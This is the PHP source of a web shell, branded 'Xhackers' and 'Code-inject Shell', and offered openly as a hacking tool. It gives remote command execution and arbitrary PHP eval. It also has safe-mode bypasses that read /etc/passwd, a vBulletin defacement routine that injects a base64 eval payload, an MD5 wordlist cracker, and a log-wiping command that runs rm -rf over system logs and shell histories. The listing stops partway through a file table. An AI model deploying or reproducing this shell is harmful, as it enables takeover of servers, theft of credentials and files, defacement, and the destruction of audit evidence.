Kod:
<p align="right"></p><body bgcolor="#000000">
<?php
/*********************************************************************
Script: Xhackers Shell
version: 2.0
Coder: Crazy_Hacker
age: 16
[!]Copyright is reserved for the coder.
[!]This script is coded by ARAB MUSLIM.
[!]The coder is Leader of Xhackers Team & Member in Hackteach Team.
[!]Plz if you need to take a code from the shell put the refrence.
Greetz To all Muslim Hackers & Programmers :)
*********************************************************************/
################# SQl Information Please Edit ########################
///////////////////////////////
//
$mysql_use = "yes"; //"no" //
$mhost = "localhost"; //
$muser = "root"; //
$mpass = ""; //
$mdb = "vb"; //
///////////////////////////////
################ End of SQL Information #############################
######################## Begining of Coding ;) ######################
error_reporting(0);
//variables
$info = $_SERVER['SERVER_SOFTWARE'];
$site = getenv("HTTP_HOST");
$page = $_SERVER['SCRIPT_NAME'];
$sname = $_SERVER['SERVER_NAME'];
$uname = php_uname();
$smod = ini_get('safe_mode');
$disfunc = ini_get('disable_functions');
$yourip = $_SERVER['REMOTE_ADDR'];
$serverip = $_SERVER['SERVER_ADDR'];
$version = phpversion();
$ccc = realpath($_GET['chdir'])."/";
$fdel = $_GET['fdel'];
$execute = $_POST['execute'];
$cmd = $_POST['cmd'];
$commander = $_POST['commander'];
$ls = "ls -la";
$source = $_POST['source'];
$gomkf = $_POST['gomkf'];
$title = $_POST['title'];
$sourcego = $_POST['sourcego'];
$ftemp = "tmp";
$temp = tempnam($ftemp, "cx");
$fcopy = $_POST['fcopy'];
$tuser = $_POST['tuser'];
$user = $_POST['user'];
$wdir = $_POST['wdir'];
$tdir = $_POST['tdir'];
$symgo = $_POST['symgo'];
$sym = "code.txt";
$to = $_POST['to'];
$sbjct = $_POST['sbjct'];
$msg = $_POST['msg'];
$header = "From:".$_POST['header'];
//PHPinfo
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
//Safemode is it on or off
if ($smod)
{
$c_h = "<font color=red face='Verdana' size='1'>ON</font>";
}
else
{
$c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
}
//Disable Functions
if (''==($disfunc))
{
$dis = "<font color=green>None</font>";
}
else
{
$dis = "<font color=red>$disfunc</font>";
}
//Change Directory
if(isset($_GET['dir']) && is_dir($_GET['dir']))
{
chdir($_GET['dir']);
}
$ccc = realpath($_GET['chdir'])."/";
//header
echo "<head>
<style>
body { font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: black;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: silver;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: black;
scrollbar-arrow-color: silver;
}
</style>
<title>code-inject Shell - [$site]</title></head>";
//header Table
echo "<body text='#FFFFFF' bgcolor='#000000'>
<table border='1' width='100%' id='table1' bordercolorlight='#C0C0C0' bordercolordark='#333333'>
<tr>
<td bgcolor='#333333'><center><a title='::+::Code-inject Shell::+::' href='".$_SERVER['HTTP_REFERER']."'>
<font color='#FFFFFF' size='5' face='Wingdings'>N</font><font color='#FFFFFF'>
<font size='5' face='Copperplate Gothic Bold'>Code-inject Sh3ll </font>
</font><font color='#FFFFFF' size='5' face='Wingdings'>N</font></a></center></td>
</tr>
<tr>
<td bgcolor='#000000' style='border: 1px solid #333333'>
<font face='Verdana' size='1'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>
</tr>
</table>";
//Buttons List
echo "<center><form method=POST action''><input type=Submit name=home value=' Home ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=Submit name=phpinfo value=' PHPinfo ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=encode value=' Encoder ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000' />=<input type=submit name=commander value=' Commander ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=Submit name=chmod value=' Chmod ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=mail value=' Send Mail ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=sbypass value='Safemode Bypass' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=log value=' Erase Logs ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=vbh value=' VB Hack ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=crack value=' Cracker ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>=<input type=submit name=eval value='Eval PHP Code' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'><br><br><input type=submit name=about value=' About ' style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form></center>";
//Edit File
$edit = $_GET['edit'];
if ($edit)
{
$content = file_get_contents($edit);
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<form method=POST action=''><input type='hidden' name='editfile' value='".$edit."'><center><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000' name='newtext'>".htmlspecialchars($content)."</textarea><br><input type=submit name='edit' value='Save' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></center></form>
</td></tr>
</table></center>";
die();
}
if (isset($_POST['edit']))
{
$file = $_POST['editfile'];
$ch = fopen($file, "w+") or die("<script>alert('Error Editing !!!'); </script>");
fwrite($ch, stripslashes($_POST['newtext'])) or die ("<script>alert('Error writing on file !!!'); </script>");
fclose($ch);
echo "<script>alert('Done :)');</script>";
}
//Make File
if (isset($gomkf))
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><form method=POST action=''><input type=hidden name=title value=".$title."><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000' name=source></textarea><br><input type='submit' name=sourcego value=Save style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></center></form>
</td></tr>
</table></center>";
die();
}
if (isset($sourcego))
{
$mkfile = fopen($title, "w+");
$write = fwrite($mkfile, stripcslashes($source));
fclose($mkfile);
}
if ($write)
{
echo "<script>alert('Saved :)');</script>";
}
//Encoder
if (isset($_POST['encode']))
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><form method=POST action=''><font face='Comic Sans MS' size='2'>.:Text:.</font> <br><textarea style='color: #FFFFFF; background-color: #000000' name=encoder></textarea><br><input type='submit' name=engo value=Encode style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></center></form>
</td></tr>
</table></center><br>";
die();
}
if (isset($_POST['engo']))
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'><center>
<font face='Comic Sans MS' size='2'>MD5: </font><input type=text value=".md5($_POST['encoder'])." size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>Sha1: </font><input type=text value=".sha1($_POST['encoder'])." size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>Crc32: </font><input type=text value=".crc32($_POST['encoder'])." size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>Base64 Encode:</font><input type=text value=".base64_encode($_POST['encoder'])." size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>Base64 Decode:</font><input type=text value=".base64_decode($_POST['encoder'])." size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'></center>
</td></tr>
</table>";
}
// Code-inject Team
if (empty($_POST['codeinject'] ) ) {
}
else
{
echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#BBB516'>
<font size='6' color='#C0C0C0'>
<p align=\"center\" dir=\"ltr\"><b>Code-inject Team</b></p>
<p align=\"center\" dir=rtl></font><font size='6' color='#BBB516'>
<br>
<font face=\"Tahoma\"><b>BySiriUS<br>
....<br>
....<br>
<a href=http://Code-inject.org><font color=\"#BBB516\">http://code-inject.org</font>
</a></b></font></p>
<font size='6' color='#C0C0C0'>
<p align=\"center\" dir=\"ltr\"><b><br>
Code-inject Team</b></p>
</font><font size='6' color='#FF0000' face=\"Tahoma\">
<p align=\"center\" dir=ltr><b>Cold z3ro<br>
BySiriUS<br>
<a href=Http://Code-inject.org/><font color=\"#FF0000\">Http://Code-inject.org/</font></a></b></p>
<font size='6' color='#BBB516'>
<p align=\"center\"></p>";
echo "</font></center></td></tr></table>";}
//Send Mail
if (isset($_POST['mail']))
{
echo "<center><table table border=0 width='100%'><tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><form method=POST action=''><font face='Comic Sans MS' size='2'>To: </font><input type=text name=to size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>From: </font><input type=text name=header size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>Subject:</font><input type=text name=sbjct size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS' size='2'>Messege:</font><br><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000' name=msg></textarea><br>
<input type=submit name=send value=' send ' style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt'></form></center></td></tr></table></center>";
die();
}
if (isset($_POST['send']))
{
mail($to,$sbjct,$msg,$header);
echo "<script>alert('Sended :) '); </script>";
}
//Safemode Bypass
if (isset($_POST['sbypass']))
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'><center>
<form method=POST action=''><font face='Comic Sans MS' size='2'>Copy : </font><input type=text name=fcopy value=/etc/passwd size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><input type=submit value=GO style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form><form method=POST action=''><font face='Comic Sans MS' size='2'>Curl: </font><input type=text name=curl value=/etc/passwd size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000' ><input type=submit value='GO' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form>
<form method=POST action=''><font face='Comic Sans MS' size='2'>ini_restore:</font><input type=text name=ini value=/etc/passwd size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000' ><input type=submit value='GO' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form>
<form method=POST action=''><font face='Comic Sans MS' size='2'>Directory: </font><input type=text name=phpdir value=/etc/valiases size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<input type=submit value='GO' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form><font color=red face='Comic Sans MS' size='1'>(Edit Sql information in shell)</font><form method=POST action=''><font face='Comic Sans MS' size='2'>SQL : </font><input type=text name=sql value=/etc/paswd size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><input type=submit value=GO style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form>
<form method=POST action=''><input type=Submit name=sym value='Bypass By Symlink' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'> <input type=Submit name=lns value='Bypass By Symlink 2' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form>
</center>
</td></tr>
</table>";
die();
}
//Safemode Bypass Code
//copy
if (copy($fcopy,$temp))
{
$codeinject = fopen("compress.zlib://".$fcopy, "r");
$read = fread($codeinject, 50000);
fclose($code-inject);
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'>".htmlspecialchars($read)."</textarea>
</center></td></tr></table></center>";
unlink($temp);
die();
}
//Bypass By SQL
if(empty($_POST['sql'])){
} else {
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><textarea rows='19' cols='103' method=POST style='color: #FFFFFF; background-color: #000000'>";
$sqlfile=$_POST['sql'];
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
$sql = array (
"USE $mdb",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$sqlfile' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
mysql_connect ($mhost, $muser, $mpass);
foreach ($sql as $statement) {
$q = mysql_query ($statement);
if ($q == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($q);
}
echo "</textarea></center></td></tr></table></center>";
die();
}
//Bypass By Symlink
if (isset($_POST['sym']))
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><form method=post action=''><font face='Comic Sans MS' size='2'>File To Copy:</font><input type=text name=symco value=etc/passwd size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'> <font face='Comic Sans MS' size='2'>Name of File to copy to:</font><input type=text name=symf value=code.txt size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br><br><input type=submit value=' OK ' name=symok style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form></center></td></tr></table></center>";
die();
}
$symco = $_POST['symco'];
$symf = $_POST['symf'];
if ($_POST['symok'])
{
symlink($symco,$symf);
echo "<script>alert('Done :) '); </script>";
echo "<script>window.location='".$symf."'</script>";
}
//Bypass By Symlink 2
$lns = $_POST['lns'];
if($lns)
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><form method=post action=''><font face='Comic Sans MS' size='2'>File To Copy:</font><input type=text name=lnc value=etc/passwd size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'> <font face='Comic Sans MS' size='2'>Name of File to copy to:</font><input type=text name=lnf value=xhackers.txt size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br><br><input type=submit value=' OK ' name=lnok style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'>
</form></center></td></tr></table></center>";
die();
}
$lnc = $_POST['lnc'];
$lnf = $_POST['lnf'];
if($_POST['lnok'])
{
system("ln -s $lnc $lnf");
echo "<script>alert('Done :) '); </script>";
echo "<script>window.location='".$lnf."'</script>";
}
//Bypass By Read-D
if (($phpdir == "") or ($phpdir == "/Directory"));
else {
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'>";
$dh = opendir($phpdir) or print("couldn't open directory");
while (!(($dfile = readdir($dh)) === false)) {
if (is_dir("$phpdir/$dfile")) {
echo "\n[D] : ";
}
echo "$dfile\n";
}
closedir($dh);
echo "</textarea></center></td></tr></table></center>";
die();
}
//Bypass By Curl
if(empty($_POST['curl'])){
} else {
echo "Reading .....","<br>" ;
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'><center>
<textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'>";
$m=$_POST['curl'];
$li =
curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($li);
var_dump(curl_exec($li));
echo "</textarea></center></td></tr></table></center>";
die();
}
//Bypass By ini_restore
if(empty($_POST['ini'])){
} else {
echo "Reading ...","<br> ";
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'>";
$ini=$_POST['ini'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
$s=readfile("$m");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
$s=readfile("$ini");
echo "</textarea></center></td></tr></table></center>";
die();
}
//Erase Logs
if (isset($_POST['log']))
{
echo "<center><table border=0 width='100%'><tr><td style='border:1px solid #C0C0C0; background-color: #333333'><center><form method=POST action=''><input type=submit name=erase value=Erase style='color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form></center></td></tr></table></center>";
die();
}
if (isset($_POST['erase']))
{
system("rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name 'log*' -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;");
echo "<script>alert('Erased :) ');</script>";
}
//Cracker
if (isset($_POST['crk']))
{
crack();
}
if (isset($_POST['crack']))
{
echo "<center><table border=0 width='100%'><tr><td style='border:1px solid #C0C0C0; background-color: #333333'><center><font face='Comic Sans MS'>.:MD5 Cracker:.</font></center><center>
<form method=POST action=''><font face='Comic Sans MS'>List: </font><input type=list name=list size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br><font face='Comic Sans MS'>Hash:</font><input type=text name=hash size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br><input type=submit name=crk value=Crack style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt'>
</form></center></td></tr></table>";
die();
}
function crack()
{
if (!empty($_POST['hash']) && !empty($_POST['list']))
{
echo "<center><table border=0 width='100%'><tr><td style='border:1px solid #C0C0C0; background-color: #333333'><center><font face='Comic Sans MS'>Cracking Please Wait ....</font>";
$hash = strtoupper($_POST['hash']);
$list = fopen($_POST['list'], "r");
if ($list)
{
while (!feof($list))
{
$word=trim(fgets($list)," \n\r");
if ($hash == strtoupper(md5($word)))
{
echo "<font face='Comic Sans MS'><br>Cracked :<br>The Password is ".$word."</font></center></td></tr></table>";
}
}
fclose($list);
}
}
}
//VB HACK
if (isset($_POST['vbh']))
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><font face='Comic Sans MS'>.:Change all pages of Vbulletin Script:.</font></center>
<center><form method=POST action=''><font face='Comic Sans MS'>Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS'>Database Username<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS'>Database Name<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS'>Database Pass<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'><br>
<font face='Comic Sans MS'>Your Index</font><br><textarea name=index rows='19' cols='103' style='color: #FFFFFF; background-color: #000000'>code-inject shell ruind your server</textarea><br>
<input type=submit value='Hack It' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px dashed #FFFFFF; background-color: #000000'></form></center></td></tr></table></center>";
die();
}
$dbh = $_POST['dbh'];
$dbu = $_POST['dbu'];
$dbn = $_POST['dbn'];
$dbp = $_POST['dbp'];
$index = $_POST['index'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
{
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$crazy_hacker = "UPDATE template SET template='".$set_index."' WHERE title='spacer_open'";
$crazy_hacker2 = "UPDATE template SET template='".$set_index."' WHERE title='FORUMHOME'";
$crazy_hacker3 = "UPDATE style SET css='".$set_index."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($crazy_hacker) or die (mysql_error());
$result = mysql_query($crazy_hacker2) or die (mysql_error());
$result = mysql_query($crazy_hacker3) or die (mysql_error());
echo "<script>alert('VB is Hacked :) ');</script>";
}
//Commander
if (isset($execute))
{
echo "<center><table border=0 width='100%'>";
echo "<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>";
echo "<pre><font face='Courier New' color=green>";
switch ($_POST['function'])
{
case "system":
system($cmd);
break;
case "passthru":
passthru($cmd);
break;
case "exec":
exec($cmd);
break;
case "shell_exec":
shell_exec($cmd);
break;
case "popen";
$codeinject = popen($_POST['cmd'].' 2>&1', 'r');
echo "'$codeinject'; " . gettype($codeinject) . "n";
$read = fread($codeinject, 2096);
echo $read;
pclose($codeinject);
}
echo "</font></pre>";
echo "</td></tr>";
echo "</table></center>";
echo "<td width='50%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'><center>
<font face='Comic Sans MS' size='2'><b>.:Execute Commands:.</b></font>
<a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<br><form method=POST action=''><input type='text' name='cmd' value='ls -la' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'></a> <select name=function size=1 style='color: #FFFFFF; background-color: #000000'>
<option>system</option>
<option>passthru</option>
<option>exec</option>
<option>shell_exec</option>
<option>popen</option>
</select><br><br>
<input type='submit' name='execute' value='Command' style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt' /></form></td>";
die();
}
if ($commander)
{
echo "<td width='50%' height='1' valign='top' style='font-family: verdana; color: #d9d9d9; font-size: 11px'><center>
<font face='Comic Sans MS' size='2'><b>.:Execute Commands:.</b></font>
<a bookmark='minipanel' style='font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none'>
<br><form method=POST action=''><input type='text' name='cmd' value='ls -la' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'></a> <select name=function size=1 style='color: #FFFFFF; background-color: #000000'>
<option>system</option>
<option>passthru</option>
<option>exec</option>
<option>shell_exec</option>
<option>popen</option>
</select><br><br>
<input type='submit' name='execute' value='Command' style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt' /></form></td>";
die();
}
//Home
if($_POST['home'])
{}
//Chmod
if ($_POST['chmod'])
{
echo "<center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><font face='Comic Sans MS'>.:Chmod:.</font></center><center>
<form method=POST action=''><font face='Comic Sans MS'>Choose File: </font><input type=text value='$ccc' name='chf' size='50' style='font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1px solid #666666; background-color: #000000'>
<br><font face='Comic Sans MS'>Chmod:</font>
<select name=chh size=1 style='color: #FFFFFF; background-color: #000000'>
<option>777</option>
<option>755</option>
<option>644</option>
<br><input type=submit name=chs value=Change style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt'>
</form></center></td></tr></table>";
die();
}
$chf = $_POST['chf'];
if ($_POST['chs'])
{
switch($_POST['chh'])
{
case 777:
chmod($chf,0777);
break;
case 755:
chmod($chf,0755);
break;
case 644:
chmod($chf,0644);
}
echo "<font face='Comic Sans MS' size=2>Changed mode of file $chf to ".$_POST['chh']."</font>";
}
//About
if (isset($_POST['about']))
{
die("<center>
<table border=0 width='53%' height='257' cellspacing='0' cellpadding='0'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
</td></tr>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333' height='28'>
<b><font face='Verdana' size='2'>::Script::</font></b></td></tr>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<font face='Verdana' size='2'>Name: codeinject Shell<br>Version: 1.0</font></td></tr>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<font face='Verdana' size='2'><b>::Author::</b></font></td></tr>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<font face='Verdana' size='2'>Name:BySiriUS<br>Age: 16<br>Country: United Arab Emirates (UAE)</font></td></tr>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
</td></tr></table></center>");
}
//Eval PHP Code
if (isset($_POST['eval']))
{
echo "<form method=POST action=''><center><table border=0 width='100%'>
<tr><td style='border:1px solid #C0C0C0; background-color: #333333'>
<center><textarea rows='19' cols='103' style='color: #FFFFFF; background-color: #000000' name=evtext></textarea><br><input type=submit name=evalp value=Execute style='color: #FFFFFF; border: 1px dotted #FFFFFF; background-color: #000000; font-size:8pt'>
</center></td></tr></table></center></form>";
die();
}
if (isset($_POST['evalp']))
{
die(eval(stripslashes($_POST['evtext'])));
}
//Files & Dir's
echo "<center><table border=0 width='100%'>";
if (is_dir($ccc)){
if ($dh=opendir($ccc)){
echo "<td style='border:1px solid #C0C0C0; background-color: #333333' height='22' align='left' nowrap><b><font face='Comic Sans MS' size=2>Files & Folders</font></b></td>
<td style='border:1px solid #C0C0C0; background-color: #333333' height='22' align='left' nowrap><b><font face='Comic Sans MS' size=2>Size</font></b></td>
<td style='border:1px solid #C0C0C0; background-color: #333333' height='22' align='left' nowrap><b><font face='Comic Sans MS' size=2>Edit File</font></b></td>
<td style='border:1px solid #C0C0C0; background-color: #333333' height='22' align='left' nowrap><b><font face='Comic Sans MS' size=2>Delete</font></b></td>
<td style='border:1px solid #C0C0C0; background-color: #333333' height='22' align='left' nowrap><b><font face='Comic Sans MS' size=2>Chmod</font></b></td>
";
while (($file = readdir($dh)) !== false) {
echo "<tr>";
echo "<td style='border:1px solid #C0C0C0; background-color: #333333' width='250' height='22' align='left' nowrap>";
if (is_dir($ccc.$file))
{
echo "<a href='?dir=ch&chdir=$ccc$file'><span style='text-decoration: none'><font face='Wingdings' color=yellow size=1>1</font><font face='Comic Sans Ms' color=red size=2>[$file]</font></span></a><br>";
}
else
{
echo "<font face='Wingdings' color=green>2</font><font face='Comic Sans Ms' size=2>$file</font><br>";
}
echo "</td>";
echo"<td style='border:1px solid #C0C0C0; background-color: #333333' width='10' align='center' nowrap>";
//File size
$fsize = round(filesize($file)/1024);
if (is_file($ccc.$file))
{
echo "<font face='Comic Sans Ms' color=red size=2>".$fsize."KB</font>";
}
else
{
echo " ";
}
echo "</td>";
//Edit
echo "<td width='10' align='center' nowrap style='border:1px solid #C0C0C0; background-color: #333333'>";
if (is_file($ccc.$file)){
echo "<a href='?dir=ch&edit=$ccc$file'><span style='text-decoration: none'><font size='2' color='green' face='Comic Sans MS'>Edit";
}else {
echo " ";
}
echo "
</a></font></td>";
//Delete
echo "<td width='10' align='center' nowrap style='border:1px solid #C0C0C0; background-color: #333333'>";
if (is_file($ccc.$file))
{
echo "<a href='?dir=ch&fdel=$ccc$file'><span style='text-decoration: none'><font size='2' face='Comic Sans MS' color=red>Delete</font></span></a>";
}
else
if (is_dir($ccc.$file))
{
echo "<a href='?dir=ch&dirdel=$ccc$file'><span style='text-decoration: none'><font size='2' face='Comic Sans MS' color=red>Delete</font></span></a>";
}
echo "</td>";
//Permissions
echo "<td width='68' style='border:1px solid #C0C0C0; background-color: #333333'>";
